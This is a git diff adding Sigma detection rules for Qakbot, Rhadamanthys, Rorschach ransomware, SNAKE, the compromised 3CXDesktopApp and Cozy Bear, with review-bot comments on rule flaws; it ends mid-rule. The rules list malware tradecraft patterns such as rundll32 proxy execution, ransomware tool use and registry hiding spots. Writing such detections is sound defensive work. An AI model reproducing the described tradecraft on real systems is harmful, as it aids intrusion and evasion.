+modified: 2023/05/30
+tags:
+ - attack.defense_evasion
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_paths:
+ CommandLine|contains:
+ # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware
+ - :\ProgramData\
+ - :\Users\Public\
+ - \AppData\Local\Temp\
+ - \AppData\Roaming\
+ ParentProcessName|endswith:
+ # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware
+ - \cmd.exe
+ - \cscript.exe
+ - \curl.exe
+ - \mshta.exe
+ - \powershell.exe
+ - \pwsh.exe
+ - \wscript.exe
+ NewProcessName|endswith: \rundll32.exe
+ selection_exports:
+ CommandLine|endswith:
+ # Note: Only add additional exports seen used by Qakbot
+ - aslr # https://tria.ge/230524-scgq9add9v/behavioral1#report
+ - bind
+ - DrawThemeIcon
+ - GG10
+ - GL70
+ - jhbvygftr
+ - kjhbhkjvydrt
+ - LS88
+ - Motd
+ - N115
+ - next # https://tria.ge/230530-n3rxpahf9w/behavioral2
+ - Nikn
+ - print
+ - qqqb
+ - qqqq
+ - RS32
+ - Test
+ - Time
+ - Updt
+ - vips
+ - Wind
+ - WW50
+ - X555
+ - XL55
+ - xlAutoOpen
+ - XS88
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml
new file mode 100644
index 000000000..854e6d612
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml
@@ -0,0 +1,43 @@
+title: Qakbot Rundll32 Fake DLL Extension Execution
+id: bfd34392-c591-4009-b938-9fd985a28b85
+status: experimental
+description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
+references:
+ - https://github.com/pr0xylife/Qakbot/
+author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/24
+tags:
+ - attack.defense_evasion
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ product: windows
+ category: process_creation
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains:
+ # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware
+ - :\ProgramData\
+ - :\Users\Public\
+ - \AppData\Local\Temp\
+ - \AppData\Roaming\
+ ParentProcessName|endswith:
+ # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware
+ - \cmd.exe
+ - \cscript.exe
+ - \curl.exe
+ - \mshta.exe
+ - \powershell.exe
+ - \pwsh.exe
+ - \wscript.exe
+ NewProcessName|endswith: \rundll32.exe
+ filter_main_extension:
+ CommandLine|contains: .dll
+ condition: process_creation and (selection and not 1 of filter_main_*)
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml
new file mode 100644
index 000000000..af3fa3ddc
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_uninstaller_cleanup.yml
@@ -0,0 +1,34 @@
+title: Qakbot Uninstaller Execution
+id: bc309b7a-3c29-4937-a4a3-e232473f9168
+status: experimental
+description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet
+references:
+ - https://www.justice.gov/usao-cdca/divisions/national-security-division/qakbot-resources
+ - https://www.virustotal.com/gui/file/7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117/community
+ - https://www.virustotal.com/gui/file/fab408536aa37c4abc8be97ab9c1f86cb33b63923d423fdc2859eb9d63fa8ea0/community
+author: Florian Roth (Nextron Systems)
+date: 2023/08/31
+modified: 2023/09/01
+tags:
+ - detection.emerging_threats
+ - attack.execution
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ - NewProcessName|endswith: \QbotUninstall.exe
+ - Hashes|contains:
+ - IMPHASH=E772C815072311D6FB8C3390743E6BE5
+ - SHA256=423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180
+ - SHA256=559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6
+ - SHA256=855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071
+ - SHA256=FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml
new file mode 100644
index 000000000..9bed93d19
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rhadamanthys/proc_creation_win_malware_rhadamanthys_stealer_dll_launch.yml
@@ -0,0 +1,35 @@
+title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE
+id: 5cdbc2e8-86dd-43df-9a1a-200d4745fba5
+status: test
+description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
+references:
+ - https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88
+ - https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/
+ - https://www.joesandbox.com/analysis/790122/0/html
+ - https://twitter.com/anfam17/status/1607477672057208835
+author: TropChaud
+date: 2023/01/26
+modified: 2023/02/05
+tags:
+ - attack.defense_evasion
+ - attack.t1218.011
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_rundll32:
+ - OriginalFileName: RUNDLL32.EXE
+ - NewProcessName|endswith: \rundll32.exe
+ selection_dll:
+ CommandLine|contains: nsis_uns
+ selection_export_function:
+ CommandLine|contains: PrintUIEntry
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml
new file mode 100644
index 000000000..370c7e1e5
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/Rorschach/proc_creation_win_malware_rorschach_ransomware_activity.yml
@@ -0,0 +1,36 @@
+title: Rorschach Ransomware Execution Activity
+id: 0e9e6c63-1350-48c4-9fa1-7ccb235edc68
+status: experimental
+description: Detects Rorschach ransomware execution activity
+references:
+ - https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/
+author: X__Junior (Nextron Systems)
+date: 2023/04/04
+modified: 2023/04/22
+tags:
+ - attack.execution
+ - attack.t1059.003
+ - attack.t1059.001
+ - attack.defense_evasion
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains: '11111111'
+ NewProcessName|endswith:
+ - \bcdedit.exe
+ - \net.exe
+ - \net1.exe
+ - \netsh.exe
+ - \wevtutil.exe
+ - \vssadmin.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml
new file mode 100644
index 000000000..7d35a7cf4
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_cli_args.yml
@@ -0,0 +1,29 @@
+title: Potential SNAKE Malware Installation CLI Arguments Indicator
+id: 02cbc035-b390-49fe-a9ff-3bb402c826db
+status: experimental
+description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report
+references:
+ - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/04
+tags:
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ # This CLI regex is based on the following description from the report:
+ # The jpsetup.exe installer requires two arguments to be passed via the command line for execution
+ # The first argument is a wide character string hashed with SHA-256 twice -> We assume that the first argument is of length SHA256
+ # The AES initialization vector (IV) consists of the first 16 bytes of the second argument to jpsetup.exe -> We assume that the second argument is of at least 16 bytes (16 characters)
+ CommandLine|re: \s[a-fA-F0-9]{64}\s[a-fA-F0-9]{16}
+ condition: process_creation and selection
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml
new file mode 100644
index 000000000..667f4e15a
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_installer_exec.yml
@@ -0,0 +1,37 @@
+title: Potential SNAKE Malware Installation Binary Indicator
+id: d91ff53f-fd0c-419d-a6b8-ae038d5c3733
+status: experimental
+description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report
+references:
+ - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/04
+tags:
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ NewProcessName|endswith:
+ - \jpsetup.exe
+ - \jpinst.exe
+ filter_main_cli_name:
+ CommandLine:
+ - jpinst.exe
+ - jpinst
+ - jpsetup.exe
+ - jpsetup
+ filter_main_cli_empty:
+ CommandLine: ''
+ filter_main_cli_null:
+ CommandLine:
+ condition: process_creation and (selection and not 1 of filter_main_*)
+falsepositives:
+ - Unlikely
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml
new file mode 100644
index 000000000..a63d4bdaa
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/proc_creation_win_malware_snake_service_execution.yml
@@ -0,0 +1,27 @@
+title: Potential SNAKE Malware Persistence Service Execution
+id: f7536642-4a08-4dd9-b6d5-c3286d8975ed
+status: experimental
+description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA.
+references:
+ - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/04
+tags:
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ ParentProcessName|endswith: \services.exe
+ NewProcessName|startswith: C:\Windows\WinSxS\
+ NewProcessName|endswith: \WerFault.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml
new file mode 100644
index 000000000..efcdeee56
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_event_malware_snake_covert_store_key.yml
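Review bot: `NewProcessName|startswith: C:\Windows\WinSxS\` hard-codes the system drive, so a Windows installation on any other drive letter is missed even though the WinSxS path is the whole signal; the loader rule at L4253 already uses the drive-agnostic `:\Program Files\...` form. `NewProcessName|contains: :\Windows\WinSxS\` keeps the intent without the drive assumption. The service rule at L4234 has the same `C:\` prefix in `ImagePath|startswith`, and there the 7045 ImagePath may presumably carry quotes or arguments, in which case `ImagePath|endswith: \WerFault.exe` would not match a quoted path — worth a comment if that limitation is accepted.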
@@ -0,0 +1,23 @@
+title: SNAKE Malware Covert Store Registry Key
+id: d0fa35db-0e92-400e-aa16-d32ae2521618
+status: experimental
+description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA
+references:
+ - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/11
+tags:
+ - attack.persistence
+ - detection.emerging_threats
+logsource:
+ category: registry_event
+ product: windows
+detection:
+ registry_event:
+ EventID: 4657
+ Channel: Security
+ selection:
+ ObjectName|endswith: SECURITY\Policy\Secrets\n
+ condition: registry_event and selection
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml
new file mode 100644
index 000000000..e8c30e58a
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/registry_set_malware_snake_encrypted_key.yml
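Review bot: This rule is the only one in the set without a `falsepositives` section (compare the registry_set rule at L4233), and nothing states that Security 4657 is only generated when Object Access > Audit Registry is enabled and the target key carries a SACL, so on a default install the rule silently never fires. Add `falsepositives:` / `- Unknown` and a logsource `definition:` in the style used at L4246, e.g. `definition: The Advanced Audit Policy setting Object Access > Audit Registry has to be enabled and a SACL set on the key for event 4657 to be generated.` The same undocumented prerequisite applies to the 4657-based rules at L4233 and L4245.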
@@ -0,0 +1,29 @@
+title: Potential Encrypted Registry Blob Related To SNAKE Malware
+id: 7e163e96-b9a5-45d6-b2cd-d7d87b13c60b
+status: experimental
+description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA
+references:
+ - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/10
+modified: 2023/08/17
+tags:
+ - attack.persistence
+ - detection.emerging_threats
+logsource:
+ category: registry_set
+ product: windows
+detection:
+ registry_set:
+ EventID: 4657
+ Channel: Security
+ selection:
+ ObjectName|contains: \SOFTWARE\Classes\.wav\OpenWithProgIds\
+ filter_main_wav:
+ - ObjectName|endswith: .AssocFile.WAV
+ - ObjectName|contains: .wav.
+ condition: registry_set and (selection and not 1 of filter_main_*)
+falsepositives:
+ - Some additional tuning might be required to tune out legitimate processes that write to this key by default
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml
new file mode 100644
index 000000000..c1217463b
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/Malware/SNAKE/win_system_malware_snake_persistence_service.yml
@@ -0,0 +1,28 @@
+title: SNAKE Malware Service Persistence
+id: b2e60816-96b2-45bd-ba91-b63578c03ef6
+status: experimental
+description: Detects the creation of a service named "WerFaultSvc" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report
+references:
+ - https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/05/10
+tags:
+ - attack.persistence
+ - detection.emerging_threats
+logsource:
+ product: windows
+ service: system
+detection:
+ system:
+ Channel: System
+ selection:
+ Provider_Name: Service Control Manager
+ EventID: 7045
+ ServiceName|contains: WerFaultSvc # Note: The report contains a "," in the name ("WerFaultSvc,"). Since we can't confirm if its a typo or not we don't use it
+ ImagePath|startswith: C:\Windows\WinSxS\
+ ImagePath|endswith: \WerFault.exe
+ condition: system and selection
+falsepositives:
+ - Unknown
+level: critical
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml
new file mode 100644
index 000000000..fe135e832
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_execution.yml
@@ -0,0 +1,104 @@
+title: Potential Compromised 3CXDesktopApp Execution
+id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c
+related:
+ - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2
+ type: similar
+ - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH
+ type: similar
+ - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2
+ type: similar
+ - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2
+ type: similar
+ - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc
+ type: similar
+ - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update
+ type: similar
+ - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad
+ type: similar
+status: experimental
+description: Detects execution of known compromised version of 3CXDesktopApp
+references:
+ - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/03/29
+modified: 2023/03/31
+tags:
+ - attack.defense_evasion
+ - attack.t1218
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_hashes_1:
+ Hashes|contains:
+ # 3CX Desktop 18.12.407
+ - SHA256=DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC
+ - SHA256=54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02
+ - SHA256=D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE
+ - SHA1=480DC408EF50BE69EBCF84B95750F7E93A8A1859
+ - SHA1=3B43A5D8B83C637D00D769660D01333E88F5A187
+ - SHA1=6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA
+ - MD5=BB915073385DD16A846DFA318AFA3C19
+ - MD5=08D79E1FFFA244CC0DC61F7D2036ACA9
+ - MD5=4965EDF659753E3C05D800C6C8A23A7A
+ # 3CX Desktop 18.12.416
+ - SHA256=FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405
+ - SHA256=5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734
+ - 
SHA256=A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203
+ - SHA1=E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1
+ - SHA1=8433A94AEDB6380AC8D4610AF643FB0E5220C5CB
+ - SHA1=413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5
+ - MD5=9833A4779B69B38E3E51F04E395674C6
+ - MD5=704DB9184700481A56E5100FB56496CE
+ - MD5=8EE6802F085F7A9DF7E0303E65722DC0
+ # 3CXDesktopApp MSI
+ - SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868
+ - SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983
+ - SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA
+ - SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E
+ - MD5=F3D4144860CA10BA60F7EF4D176CC736
+ - MD5=0EEB1C0133EB4D571178B2D9D14CE3E9
+ selection_hashes_2:
+ - sha256:
+ - DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC
+ - 54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02
+ - D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE
+ - FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405
+ - 5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734
+ - A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203
+ - AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868
+ - 59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983
+ - sha1:
+ - 480DC408EF50BE69EBCF84B95750F7E93A8A1859
+ - 3B43A5D8B83C637D00D769660D01333E88F5A187
+ - 6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA
+ - E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1
+ - 8433A94AEDB6380AC8D4610AF643FB0E5220C5CB
+ - 413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5
+ - BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA
+ - BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E
+ - md5:
+ - BB915073385DD16A846DFA318AFA3C19
+ - 08D79E1FFFA244CC0DC61F7D2036ACA9
+ - 4965EDF659753E3C05D800C6C8A23A7A
+ - 9833A4779B69B38E3E51F04E395674C6
+ - 704DB9184700481A56E5100FB56496CE
+ - 8EE6802F085F7A9DF7E0303E65722DC0
+ - F3D4144860CA10BA60F7EF4D176CC736
+ - 0EEB1C0133EB4D571178B2D9D14CE3E9
+ selection_pe_1:
+ - 
OriginalFileName: 3CXDesktopApp.exe
+ - NewProcessName|endswith: \3CXDesktopApp.exe
+ - Product: 3CX Desktop App
+ selection_pe_2:
+ FileVersion|contains: 18.12.
+ condition: process_creation and (all of selection_pe_* or 1 of selection_hashes_*)
+falsepositives:
+ - Legitimate usage of 3CXDesktopApp
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml
new file mode 100644
index 000000000..6d08d787c
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_children.yml
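Review bot: `selection_hashes_1`, `selection_hashes_2` and `selection_pe_1`/`selection_pe_2` read `Hashes`, `sha256`/`sha1`/`md5`, `OriginalFileName`, `Product` and `FileVersion`, and as far as I know a Security 4688 event carries none of these (its process fields are NewProcessName, CommandLine, ParentProcessName and the subject/token fields), so on this log source only `NewProcessName|endswith: \3CXDesktopApp.exe` can ever match and `all of selection_pe_*` is unsatisfiable — the converted rule would never fire. Either document the limitation in a logsource `definition:` (the Sysmon original's hash and version precision is not available in 4688) or reduce the condition to the one satisfiable selector, accepting and documenting that it then flags every 3CXDesktopApp start rather than only the compromised builds. The hunk starts at L4235. The loader rule at L4253 has the same dead `Hashes|contains` branch, though its `1 of selection_*` still fires through the image path.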
@@ -0,0 +1,52 @@
+title: Potential Suspicious Child Process Of 3CXDesktopApp
+id: 63f3605b-979f-48c2-b7cc-7f90523fed88
+related:
+ - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2
+ type: similar
+ - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH
+ type: similar
+ - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2
+ type: similar
+ - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2
+ type: similar
+ - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec
+ type: similar
+ - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update
+ type: similar
+ - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad
+ type: similar
+status: experimental
+description: Detects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise
+references:
+ - https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/
+ - https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/03/29
+tags:
+ - attack.command_and_control
+ - attack.execution
+ - attack.t1218
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ ParentProcessName|endswith: \3CXDesktopApp.exe
+ NewProcessName|endswith:
+ - \cmd.exe
+ - \cscript.exe
+ - \mshta.exe
+ - \powershell.exe
+ - \pwsh.exe
+ - \regsvr32.exe
+ - \rundll32.exe
+ - \wscript.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml
new file mode 100644
index 000000000..2c79aa6a2
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/3CX-Supply-Chain/proc_creation_win_malware_3cx_compromise_susp_update.yml
@@ -0,0 +1,47 @@
+title: Potential Compromised 3CXDesktopApp Update Activity
+id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a
+related:
+ - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2
+ type: similar
+ - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH
+ type: similar
+ - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2
+ type: similar
+ - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2
+ type: similar
+ - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec
+ type: similar
+ - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc
+ type: similar
+ - id: d0b65ad3-e945-435e-a7a9-438e62dd48e9 # ImageLoad
+ type: similar
+status: experimental
+description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
+references:
+ - https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/
+ - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats
+author: Nasreddine Bencherchali (Nextron Systems)
+date: 2023/03/29
+tags:
+ - attack.defense_evasion
+ - attack.t1218
+ - attack.execution
+ - detection.emerging_threats
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - --update
+ - http
+ - /electron/update/win32/18.12
+ NewProcessName|endswith: \3CXDesktopApp\app\update.exe
+ condition: process_creation and selection
+falsepositives:
+ - Unknown
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml
new file mode 100644
index 000000000..3ca90b2c4
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/emerging-threats/2023/TA/Cozy-Bear/win_security_apt_cozy_bear_scheduled_tasks_name.yml
@@ -0,0 +1,50 @@
+title: Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor
+id: 8fa65166-f463-4fd2-ad4f-1436133c52e1
+related:
